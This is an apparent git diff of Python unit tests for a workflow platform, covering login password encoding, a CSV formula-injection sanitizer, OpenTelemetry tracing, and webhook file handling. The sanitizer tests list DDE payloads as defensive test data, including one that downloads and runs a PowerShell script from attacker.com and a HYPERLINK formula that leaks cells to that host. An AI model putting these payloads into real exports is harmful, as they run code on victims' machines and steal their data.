with app.test_request_context(
"/login",
method="POST",
json={"email": "test@example.com", "password": "ValidPass123!", "invite_token": "valid_token"},
json={
"email": "test@example.com",
"password": encode_password("ValidPass123!"),
"invite_token": "valid_token",
},
):
login_api = LoginApi()
response = login_api.post()
@ -186,7 +198,7 @@ class TestLoginApi:
# Act & Assert
with app.test_request_context(
"/login", method="POST", json={"email": "test@example.com", "password": "password"}
"/login", method="POST", json={"email": "test@example.com", "password": encode_password("password")}
):
login_api = LoginApi()
with pytest.raises(EmailPasswordLoginLimitError):
@ -209,7 +221,7 @@ class TestLoginApi:
# Act & Assert
with app.test_request_context(
"/login", method="POST", json={"email": "frozen@example.com", "password": "password"}
"/login", method="POST", json={"email": "frozen@example.com", "password": encode_password("password")}
):
login_api = LoginApi()
with pytest.raises(AccountInFreezeError):
@ -246,7 +258,7 @@ class TestLoginApi:
# Act & Assert
with app.test_request_context(
"/login", method="POST", json={"email": "test@example.com", "password": "WrongPass123!"}
"/login", method="POST", json={"email": "test@example.com", "password": encode_password("WrongPass123!")}
):
login_api = LoginApi()
with pytest.raises(AuthenticationFailedError):
@ -277,7 +289,7 @@ class TestLoginApi:
# Act & Assert
with app.test_request_context(
"/login", method="POST", json={"email": "banned@example.com", "password": "ValidPass123!"}
"/login", method="POST", json={"email": "banned@example.com", "password": encode_password("ValidPass123!")}
):
login_api = LoginApi()
with pytest.raises(AccountBannedError):
@ -322,7 +334,7 @@ class TestLoginApi:
# Act & Assert
with app.test_request_context(
"/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"}
"/login", method="POST", json={"email": "test@example.com", "password": encode_password("ValidPass123!")}
):
login_api = LoginApi()
with pytest.raises(WorkspacesLimitExceeded):
@ -349,7 +361,11 @@ class TestLoginApi:
with app.test_request_context(
"/login",
method="POST",
json={"email": "different@example.com", "password": "ValidPass123!", "invite_token": "token"},
json={
"email": "different@example.com",
"password": encode_password("ValidPass123!"),
"invite_token": "token",
},
):
login_api = LoginApi()
with pytest.raises(InvalidEmailError):

View File

@ -0,0 +1,151 @@
"""Unit tests for CSV sanitizer."""
from core.helper.csv_sanitizer import CSVSanitizer
class TestCSVSanitizer:
"""Test cases for CSV sanitization to prevent formula injection attacks."""
def test_sanitize_formula_equals(self):
"""Test sanitizing values starting with = (most common formula injection)."""
assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0"
assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)"
assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1"
assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)"
def test_sanitize_formula_plus(self):
"""Test sanitizing values starting with + (plus formula injection)."""
assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc"
assert CSVSanitizer.sanitize_value("+123") == "'+123"
assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0"
def test_sanitize_formula_minus(self):
"""Test sanitizing values starting with - (minus formula injection)."""
assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc"
assert CSVSanitizer.sanitize_value("-456") == "'-456"
assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad"
def test_sanitize_formula_at(self):
"""Test sanitizing values starting with @ (at-sign formula injection)."""
assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc"
assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)"
def test_sanitize_formula_tab(self):
"""Test sanitizing values starting with tab character."""
assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1"
assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc"
def test_sanitize_formula_carriage_return(self):
"""Test sanitizing values starting with carriage return."""
assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1"
assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd"
def test_sanitize_safe_values(self):
"""Test that safe values are not modified."""
assert CSVSanitizer.sanitize_value("Hello World") == "Hello World"
assert CSVSanitizer.sanitize_value("123") == "123"
assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com"
assert CSVSanitizer.sanitize_value("Normal text") == "Normal text"
assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?"
def test_sanitize_safe_values_with_special_chars_in_middle(self):
"""Test that special characters in the middle are not escaped."""
assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C"
assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20"
assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com"
def test_sanitize_empty_values(self):
"""Test handling of empty values."""
assert CSVSanitizer.sanitize_value("") == ""
assert CSVSanitizer.sanitize_value(None) == ""
def test_sanitize_numeric_types(self):
"""Test handling of numeric types."""
assert CSVSanitizer.sanitize_value(123) == "123"
assert CSVSanitizer.sanitize_value(456.789) == "456.789"
assert CSVSanitizer.sanitize_value(0) == "0"
# Negative numbers should be escaped (start with -)
assert CSVSanitizer.sanitize_value(-123) == "'-123"
def test_sanitize_boolean_types(self):
"""Test handling of boolean types."""
assert CSVSanitizer.sanitize_value(True) == "True"
assert CSVSanitizer.sanitize_value(False) == "False"
def test_sanitize_dict_with_specific_fields(self):
"""Test sanitizing specific fields in a dictionary."""
data = {
"question": "=1+1",
"answer": "+cmd|'/c calc",
"safe_field": "Normal text",
"id": "12345",
}
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"])
assert sanitized["question"] == "'=1+1"
assert sanitized["answer"] == "'+cmd|'/c calc"
assert sanitized["safe_field"] == "Normal text"
assert sanitized["id"] == "12345"
def test_sanitize_dict_all_string_fields(self):
"""Test sanitizing all string fields when no field list provided."""
data = {
"question": "=1+1",
"answer": "+calc",
"id": 123, # Not a string, should be ignored
}
sanitized = CSVSanitizer.sanitize_dict(data, None)
assert sanitized["question"] == "'=1+1"
assert sanitized["answer"] == "'+calc"
assert sanitized["id"] == 123 # Unchanged
def test_sanitize_dict_with_missing_fields(self):
"""Test that missing fields in dict don't cause errors."""
data = {"question": "=1+1"}
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"])
assert sanitized["question"] == "'=1+1"
assert "nonexistent_field" not in sanitized
def test_sanitize_dict_creates_copy(self):
"""Test that sanitize_dict creates a copy and doesn't modify original."""
original = {"question": "=1+1", "answer": "Normal"}
sanitized = CSVSanitizer.sanitize_dict(original, ["question"])
assert original["question"] == "=1+1" # Original unchanged
assert sanitized["question"] == "'=1+1" # Copy sanitized
def test_real_world_csv_injection_payloads(self):
"""Test against real-world CSV injection attack payloads."""
# Common DDE (Dynamic Data Exchange) attack payloads
payloads = [
"=cmd|'/c calc'!A0",
"=cmd|'/c notepad'!A0",
"+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'",
"-2+3+cmd|'/c calc'",
"@SUM(1+1)*cmd|'/c calc'",
"=1+1+cmd|'/c calc'",
'=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")',
]
for payload in payloads:
result = CSVSanitizer.sanitize_value(payload)
# All should be prefixed with single quote
assert result.startswith("'"), f"Payload not sanitized: {payload}"
assert result == f"'{payload}", f"Unexpected sanitization for: {payload}"
def test_multiline_strings(self):
"""Test handling of multiline strings."""
multiline = "Line 1\nLine 2\nLine 3"
assert CSVSanitizer.sanitize_value(multiline) == multiline
multiline_with_formula = "=SUM(A1)\nLine 2"
assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}"
def test_whitespace_only_strings(self):
"""Test handling of whitespace-only strings."""
assert CSVSanitizer.sanitize_value(" ") == " "
assert CSVSanitizer.sanitize_value("\n\n") == "\n\n"
# Tab at start should be escaped
assert CSVSanitizer.sanitize_value("\t ") == "'\t "

View File

@ -0,0 +1,101 @@
"""
Shared fixtures for ObservabilityLayer tests.
"""
from unittest.mock import MagicMock, patch
import pytest
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import SimpleSpanProcessor
from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter
from opentelemetry.trace import set_tracer_provider
from core.workflow.enums import NodeType
@pytest.fixture
def memory_span_exporter():
"""Provide an in-memory span exporter for testing."""
return InMemorySpanExporter()
@pytest.fixture
def tracer_provider_with_memory_exporter(memory_span_exporter):
"""Provide a TracerProvider configured with memory exporter."""
import opentelemetry.trace as trace_api
trace_api._TRACER_PROVIDER = None
trace_api._TRACER_PROVIDER_SET_ONCE._done = False
provider = TracerProvider()
processor = SimpleSpanProcessor(memory_span_exporter)
provider.add_span_processor(processor)
set_tracer_provider(provider)
yield provider
provider.force_flush()
@pytest.fixture
def mock_start_node():
"""Create a mock Start Node."""
node = MagicMock()
node.id = "test-start-node-id"
node.title = "Start Node"
node.execution_id = "test-start-execution-id"
node.node_type = NodeType.START
return node
@pytest.fixture
def mock_llm_node():
"""Create a mock LLM Node."""
node = MagicMock()
node.id = "test-llm-node-id"
node.title = "LLM Node"
node.execution_id = "test-llm-execution-id"
node.node_type = NodeType.LLM
return node
@pytest.fixture
def mock_tool_node():
"""Create a mock Tool Node with tool-specific attributes."""
from core.tools.entities.tool_entities import ToolProviderType
from core.workflow.nodes.tool.entities import ToolNodeData
node = MagicMock()
node.id = "test-tool-node-id"
node.title = "Test Tool Node"
node.execution_id = "test-tool-execution-id"
node.node_type = NodeType.TOOL
tool_data = ToolNodeData(
title="Test Tool Node",
desc=None,
provider_id="test-provider-id",
provider_type=ToolProviderType.BUILT_IN,
provider_name="test-provider",
tool_name="test-tool",
tool_label="Test Tool",
tool_configurations={},
tool_parameters={},
)
node._node_data = tool_data
return node
@pytest.fixture
def mock_is_instrument_flag_enabled_false():
"""Mock is_instrument_flag_enabled to return False."""
with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False):
yield
@pytest.fixture
def mock_is_instrument_flag_enabled_true():
"""Mock is_instrument_flag_enabled to return True."""
with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True):
yield
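
For reference, the in-memory exporter pattern these fixtures wire up can be exercised on its own like this (plain OpenTelemetry SDK, no Dify code):

```python
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import SimpleSpanProcessor
from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter

exporter = InMemorySpanExporter()
provider = TracerProvider()
provider.add_span_processor(SimpleSpanProcessor(exporter))

tracer = provider.get_tracer(__name__)
with tracer.start_as_current_span("demo-span"):
    pass  # the span ends when the context manager exits

finished = exporter.get_finished_spans()
assert len(finished) == 1
assert finished[0].name == "demo-span"
```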

View File

@ -0,0 +1,219 @@
"""
Tests for ObservabilityLayer.
Test coverage:
- Initialization and enable/disable logic
- Node span lifecycle (start, end, error handling)
- Parser integration (default and tool-specific)
- Graph lifecycle management
- Disabled mode behavior
"""
from unittest.mock import patch
import pytest
from opentelemetry.trace import StatusCode
from core.workflow.enums import NodeType
from core.workflow.graph_engine.layers.observability import ObservabilityLayer
class TestObservabilityLayerInitialization:
"""Test ObservabilityLayer initialization logic."""
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter):
"""Test that layer initializes correctly when OTel is enabled."""
layer = ObservabilityLayer()
assert not layer._is_disabled
assert layer._tracer is not None
assert NodeType.TOOL in layer._parsers
assert layer._default_parser is not None
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true")
def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter):
"""Test that layer enables when instrument flag is enabled."""
layer = ObservabilityLayer()
assert not layer._is_disabled
assert layer._tracer is not None
assert NodeType.TOOL in layer._parsers
assert layer._default_parser is not None
class TestObservabilityLayerNodeSpanLifecycle:
"""Test node span creation and lifecycle management."""
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_node_span_created_and_ended(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
):
"""Test that span is created on node start and ended on node end."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_llm_node)
layer.on_node_run_end(mock_llm_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 1
assert spans[0].name == mock_llm_node.title
assert spans[0].status.status_code == StatusCode.OK
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_node_error_recorded_in_span(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
):
"""Test that node execution errors are recorded in span."""
layer = ObservabilityLayer()
layer.on_graph_start()
error = ValueError("Test error")
layer.on_node_run_start(mock_llm_node)
layer.on_node_run_end(mock_llm_node, error)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 1
assert spans[0].status.status_code == StatusCode.ERROR
assert len(spans[0].events) > 0
assert any("exception" in event.name.lower() for event in spans[0].events)
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_node_end_without_start_handled_gracefully(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
):
"""Test that ending a node without start doesn't crash."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_end(mock_llm_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 0
class TestObservabilityLayerParserIntegration:
"""Test parser integration for different node types."""
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_default_parser_used_for_regular_node(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node
):
"""Test that default parser is used for non-tool nodes."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_start_node)
layer.on_node_run_end(mock_start_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 1
attrs = spans[0].attributes
assert attrs["node.id"] == mock_start_node.id
assert attrs["node.execution_id"] == mock_start_node.execution_id
assert attrs["node.type"] == mock_start_node.node_type.value
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_tool_parser_used_for_tool_node(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node
):
"""Test that tool parser is used for tool nodes."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_tool_node)
layer.on_node_run_end(mock_tool_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 1
attrs = spans[0].attributes
assert attrs["node.id"] == mock_tool_node.id
assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id
assert attrs["tool.provider.type"] == mock_tool_node._node_data.provider_type.value
assert attrs["tool.name"] == mock_tool_node._node_data.tool_name
class TestObservabilityLayerGraphLifecycle:
"""Test graph lifecycle management."""
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node):
"""Test that on_graph_start clears node contexts."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_llm_node)
assert len(layer._node_contexts) == 1
layer.on_graph_start()
assert len(layer._node_contexts) == 0
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_on_graph_end_with_no_unfinished_spans(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
):
"""Test that on_graph_end handles normal completion."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_llm_node)
layer.on_node_run_end(mock_llm_node, None)
layer.on_graph_end(None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 1
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_on_graph_end_with_unfinished_spans_logs_warning(
self, tracer_provider_with_memory_exporter, mock_llm_node, caplog
):
"""Test that on_graph_end logs warning for unfinished spans."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_llm_node)
assert len(layer._node_contexts) == 1
layer.on_graph_end(None)
assert len(layer._node_contexts) == 0
assert "node spans were not properly ended" in caplog.text
class TestObservabilityLayerDisabledMode:
"""Test behavior when layer is disabled."""
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node):
"""Test that disabled layer doesn't create spans on node start."""
layer = ObservabilityLayer()
assert layer._is_disabled
layer.on_graph_start()
layer.on_node_run_start(mock_start_node)
layer.on_node_run_end(mock_start_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 0
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node):
"""Test that disabled layer doesn't process node end."""
layer = ObservabilityLayer()
assert layer._is_disabled
layer.on_node_run_end(mock_llm_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 0
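
These tests toggle behaviour by patching a config attribute; a self-contained sketch of that technique (using a stand-in config object rather than `dify_config`):

```python
from types import SimpleNamespace
from unittest.mock import patch

config = SimpleNamespace(ENABLE_OTEL=False)  # stand-in for a settings object


def tracing_enabled() -> bool:
    return config.ENABLE_OTEL


with patch.object(config, "ENABLE_OTEL", True):
    assert tracing_enabled() is True
assert tracing_enabled() is False  # the original value is restored on exit
```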

View File

@ -0,0 +1,452 @@
"""
Unit tests for webhook file conversion fix.
This test verifies that webhook trigger nodes properly convert file dictionaries
to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error
when passing files to downstream LLM nodes.
"""
from unittest.mock import Mock, patch
from core.app.entities.app_invoke_entities import InvokeFrom
from core.workflow.entities.graph_init_params import GraphInitParams
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.nodes.trigger_webhook.entities import (
ContentType,
Method,
WebhookBodyParameter,
WebhookData,
)
from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode
from core.workflow.runtime.graph_runtime_state import GraphRuntimeState
from core.workflow.runtime.variable_pool import VariablePool
from core.workflow.system_variable import SystemVariable
from models.enums import UserFrom
from models.workflow import WorkflowType
def create_webhook_node(
webhook_data: WebhookData,
variable_pool: VariablePool,
tenant_id: str = "test-tenant",
) -> TriggerWebhookNode:
"""Helper function to create a webhook node with proper initialization."""
node_config = {
"id": "webhook-node-1",
"data": webhook_data.model_dump(),
}
graph_init_params = GraphInitParams(
tenant_id=tenant_id,
app_id="test-app",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="test-workflow",
graph_config={},
user_id="test-user",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
)
runtime_state = GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
)
node = TriggerWebhookNode(
id="webhook-node-1",
config=node_config,
graph_init_params=graph_init_params,
graph_runtime_state=runtime_state,
)
# Attach a lightweight app_config onto runtime state for tenant lookups
runtime_state.app_config = Mock()
runtime_state.app_config.tenant_id = tenant_id
# Provide compatibility alias expected by node implementation
# Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests
node.node_id = node.id
return node
def create_test_file_dict(
filename: str = "test.jpg",
file_type: str = "image",
transfer_method: str = "local_file",
) -> dict:
"""Create a test file dictionary as it would come from webhook service."""
return {
"id": "file-123",
"tenant_id": "test-tenant",
"type": file_type,
"filename": filename,
"extension": ".jpg",
"mime_type": "image/jpeg",
"transfer_method": transfer_method,
"related_id": "related-123",
"storage_key": "storage-key-123",
"size": 1024,
"url": "https://example.com/test.jpg",
"created_at": 1234567890,
"used_at": None,
"hash": "file-hash-123",
}
def test_webhook_node_file_conversion_to_file_variable():
"""Test that webhook node converts file dictionaries to FileVariable objects."""
# Create test file dictionary (as it comes from webhook service)
file_dict = create_test_file_dict("uploaded_image.jpg")
data = WebhookData(
title="Test Webhook with File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="image_upload", type="file", required=True),
WebhookBodyParameter(name="message", type="string", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {"message": "Test message"},
"files": {
"image_upload": file_dict,
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Mock the file factory and variable factory
with (
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
):
# Setup mocks
mock_file_obj = Mock()
mock_file_obj.to_dict.return_value = file_dict
mock_file_factory.return_value = mock_file_obj
mock_segment = Mock()
mock_segment.value = mock_file_obj
mock_segment_factory.return_value = mock_segment
mock_file_var_instance = Mock()
mock_file_variable.return_value = mock_file_var_instance
# Run the node
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify file factory was called with correct parameters
mock_file_factory.assert_called_once_with(
mapping=file_dict,
tenant_id="test-tenant",
)
# Verify segment factory was called to create FileSegment
mock_segment_factory.assert_called_once()
# Verify FileVariable was created with correct parameters
mock_file_variable.assert_called_once()
call_args = mock_file_variable.call_args[1]
assert call_args["name"] == "image_upload"
# value should be the .value of the segment returned by build_segment_with_type
assert call_args["value"] == mock_segment.value
assert call_args["selector"] == ["webhook-node-1", "image_upload"]
# Verify output contains the FileVariable, not the original dict
assert result.outputs["image_upload"] == mock_file_var_instance
assert result.outputs["message"] == "Test message"
def test_webhook_node_file_conversion_with_missing_files():
"""Test webhook node file conversion with missing file parameter."""
data = WebhookData(
title="Test Webhook with Missing File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="missing_file", type="file", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {}, # No files
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle the missing-file case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify no file entries were produced for the missing parameter
assert result.outputs["_webhook_raw"]["files"] == {}
def test_webhook_node_file_conversion_with_none_file():
"""Test webhook node file conversion with None file value."""
data = WebhookData(
title="Test Webhook with None File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="none_file", type="file", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": None,
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle None case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify None file parameter is None
assert result.outputs["_webhook_raw"]["files"]["file"] is None
def test_webhook_node_file_conversion_with_non_dict_file():
"""Test webhook node file conversion with non-dict file value."""
data = WebhookData(
title="Test Webhook with Non-Dict File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="wrong_type", type="file", required=True),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": "not_a_dict", # Wrapped to match node expectation
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle non-dict case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify fallback to original (wrapped) mapping
assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict"
def test_webhook_node_file_conversion_mixed_parameters():
"""Test webhook node with mixed parameter types including files."""
file_dict = create_test_file_dict("mixed_test.jpg")
data = WebhookData(
title="Test Webhook Mixed Parameters",
method=Method.POST,
content_type=ContentType.FORM_DATA,
headers=[],
params=[],
body=[
WebhookBodyParameter(name="text_param", type="string", required=True),
WebhookBodyParameter(name="number_param", type="number", required=False),
WebhookBodyParameter(name="file_param", type="file", required=True),
WebhookBodyParameter(name="bool_param", type="boolean", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {
"text_param": "Hello World",
"number_param": 42,
"bool_param": True,
},
"files": {
"file_param": file_dict,
},
}
},
)
node = create_webhook_node(data, variable_pool)
with (
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
):
# Setup mocks for file
mock_file_obj = Mock()
mock_file_factory.return_value = mock_file_obj
mock_segment = Mock()
mock_segment.value = mock_file_obj
mock_segment_factory.return_value = mock_segment
mock_file_var = Mock()
mock_file_variable.return_value = mock_file_var
# Run the node
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify all parameters are present
assert result.outputs["text_param"] == "Hello World"
assert result.outputs["number_param"] == 42
assert result.outputs["bool_param"] is True
assert result.outputs["file_param"] == mock_file_var
# Verify file conversion was called
mock_file_factory.assert_called_once_with(
mapping=file_dict,
tenant_id="test-tenant",
)
def test_webhook_node_different_file_types():
"""Test webhook node file conversion with different file types."""
image_dict = create_test_file_dict("image.jpg", "image")
data = WebhookData(
title="Test Webhook Different File Types",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="image", type="file", required=True),
WebhookBodyParameter(name="document", type="file", required=True),
WebhookBodyParameter(name="video", type="file", required=True),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"image": image_dict,
"document": create_test_file_dict("document.pdf", "document"),
"video": create_test_file_dict("video.mp4", "video"),
},
}
},
)
node = create_webhook_node(data, variable_pool)
with (
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
):
# Setup mocks for all files
mock_file_objs = [Mock() for _ in range(3)]
mock_segments = [Mock() for _ in range(3)]
mock_file_vars = [Mock() for _ in range(3)]
# Map each segment.value to its corresponding mock file obj
for seg, f in zip(mock_segments, mock_file_objs):
seg.value = f
mock_file_factory.side_effect = mock_file_objs
mock_segment_factory.side_effect = mock_segments
mock_file_variable.side_effect = mock_file_vars
# Run the node
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify all file types were converted
assert mock_file_factory.call_count == 3
assert result.outputs["image"] == mock_file_vars[0]
assert result.outputs["document"] == mock_file_vars[1]
assert result.outputs["video"] == mock_file_vars[2]
def test_webhook_node_file_conversion_with_non_dict_wrapper():
"""Test webhook node file conversion when the file wrapper is not a dict."""
data = WebhookData(
title="Test Webhook with Non-dict File Wrapper",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": "just a string",
},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Verify successful execution (should not crash)
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify fallback to original value
assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string"

View File

@ -1,8 +1,10 @@
from unittest.mock import patch
import pytest
from core.app.entities.app_invoke_entities import InvokeFrom
from core.file import File, FileTransferMethod, FileType
from core.variables import StringVariable
from core.variables import FileVariable, StringVariable
from core.workflow.entities.graph_init_params import GraphInitParams
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.nodes.trigger_webhook.entities import (
@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool)
"data": webhook_data.model_dump(),
}
graph_init_params = GraphInitParams(
tenant_id="1",
app_id="1",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="1",
graph_config={},
user_id="1",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
)
runtime_state = GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
)
node = TriggerWebhookNode(
id="1",
config=node_config,
graph_init_params=GraphInitParams(
tenant_id="1",
app_id="1",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="1",
graph_config={},
user_id="1",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
),
graph_runtime_state=GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
),
graph_init_params=graph_init_params,
